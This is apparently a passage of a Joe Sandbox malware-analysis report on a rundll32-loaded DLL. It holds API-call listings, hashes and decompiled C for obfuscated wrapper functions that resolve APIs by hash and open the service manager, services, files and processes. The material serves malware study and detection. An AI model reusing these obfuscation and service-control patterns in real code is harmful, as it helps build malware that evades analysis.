Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6

Uniqueness

Uniqueness Score: -1.00%

Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(000000FF,00000001), ref: 100174ED
GetActiveWindow.USER32 ref: 100174F8
SetActiveWindow.USER32(000000FF), ref: 10017506
FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16

Uniqueness

Uniqueness Score: -1.00%

Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1002E228
GetTickCount.KERNEL32 ref: 1002E235
CoFreeUnusedLibraries.OLE32 ref: 1002E244
GetTickCount.KERNEL32 ref: 1002E24A

Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52

Uniqueness

Uniqueness Score: -1.00%

Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 10027CFB

Strings

(, xrefs: 10027E0B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100259F5

Strings

@, xrefs: 10025A58

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001508F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
PathFindExtensionA.SHLWAPI(?), ref: 100150CB

Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33

Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE

Strings

%s.dll, xrefs: 100150D1

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61

Uniqueness

Uniqueness Score: -1.00%

Function 10001FF0 Relevance: 5.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
SetLastError.KERNEL32(0000007E), ref: 10002087

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10020B38 Relevance: 5.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 10020B95
LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
LocalFree.KERNEL32(?), ref: 10020BAE
TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10020E5D Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61

Uniqueness

Uniqueness Score: -1.00%

Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
TlsGetValue.KERNEL32 ref: 100206E6
LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 2308, Parent PID: 236COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1080
Total number of Limit Nodes:	17

Executed Functions

Function 0038912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0038912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E003920B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0039AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}

0x0038912f
0x00389130
0x00389133
0x00389138
0x0038913a
0x0038913d
0x0038913e
0x00389141
0x00389143
0x00389144
0x00389149
0x0038915a
0x00389162
0x0038916a
0x00389171
0x00389178
0x00389186
0x00389189
0x00389190
0x0038919d
0x003891a8
0x003891af

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003891A8

Strings

WF, xrefs: 00389149

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: WF
API String ID: 1889721586-2390014890
Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
Instruction ID: 0e09f9c3c52693cc0f2f8bd4159b03bd1eafa75d74bd10455dc6296ee168e139
Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
Instruction Fuzzy Hash: 10016971901108FBEB05CB95DD4ACAFBFB8EB85714F108099F404A7200D7B15F109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 003842C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E003842C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003920B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0039AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}

0x003842c7
0x003842c8
0x003842ca
0x003842cd
0x003842cf
0x003842d2
0x003842d5
0x003842d8
0x003842db
0x003842dc
0x003842dd
0x003842e2
0x003842ec
0x003842f5
0x003842fc
0x00384303
0x0038430a
0x00384311
0x00384318
0x00384330
0x0038433f
0x00384345

APIs

OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00394A8F,?,?,2635DC09), ref: 0038433F

Strings

X%v, xrefs: 0038430A

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: X%v
API String ID: 3098006287-3430654708
Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
Instruction ID: 11fd8ec26fd23efae99d8e596a30954f578b5b2e33872c1ee6e6dadb643bbed1
Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
Instruction Fuzzy Hash: FB0104B281120CFBDF16DFD4D9468DEBF79EB14314F148188F90566221D2729B609B91

Uniqueness

Uniqueness Score: -1.00%

Function 00388F65 Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00388F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003920B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0039AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}

0x00388f6d
0x00388f72
0x00388f73
0x00388f76
0x00388f79
0x00388f7c
0x00388f7f
0x00388f80
0x00388f83
0x00388f86
0x00388f8a
0x00388f8b
0x00388f90
0x00388f9f
0x00388faa
0x00388fb1
0x00388fb2
0x00388fb9
0x00388fc0
0x00388fc7
0x00388fce
0x00388fd5
0x00388fdc
0x00388fe3
0x00388ff0
0x00389009
0x00389010

APIs

CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00389009

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
Instruction ID: 42787a021447933c98fe7e384b00541848403b78b093a769562804de49e96473
Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
Instruction Fuzzy Hash: C8112B72900219FBCF229FE5DD098DFBFB5EF58354F118148F90862121C3328A61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00387F5D Relevance: 1.6, APIs: 1, Instructions: 54
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0038AD99,?,?,?,181C8C04,0038AD99), ref: 00387FEB

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction ID: a88088d4b1b444832c1afd1fa9c101eb69f175c6f7dbf73e0f604ac2399c5120
Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
Instruction Fuzzy Hash: 1311E572402128BBDF629F91DD09CEF7F79FF093A4F149244FA1925121D3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00384DDD Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00384DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003920B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0039AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}

0x00384de4
0x00384de7
0x00384de9
0x00384dec
0x00384def
0x00384df1
0x00384df6
0x00384dfd
0x00384e06
0x00384e0d
0x00384e14
0x00384e21
0x00384e22
0x00384e27
0x00384e28
0x00384e2b
0x00384e32
0x00384e39
0x00384e45
0x00384e4a
0x00384e4d
0x00384e54
0x00384e63
0x00384e64
0x00384e6d
0x00384e73

APIs

SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00384E6D

Memory Dump Source

Source File: 0000000A.00000002.547315062.0000000000381000.00000020.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.547299182.0000000000380000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.547355477.00000000003A3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
Instruction ID: ae3ca451f43486f2c463c692ad12a2217ef7febe235c66ab12a7a4afb0f3f6f5
Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
Instruction Fuzzy Hash: AD0139B5E01209FBCF14EFA4D9469DEBFB4EF40318F10C088E904AA251D7744B549B91

Uniqueness

Uniqueness Score: -1.00%

Function 00385DDD Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00385DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E003920B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0039AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
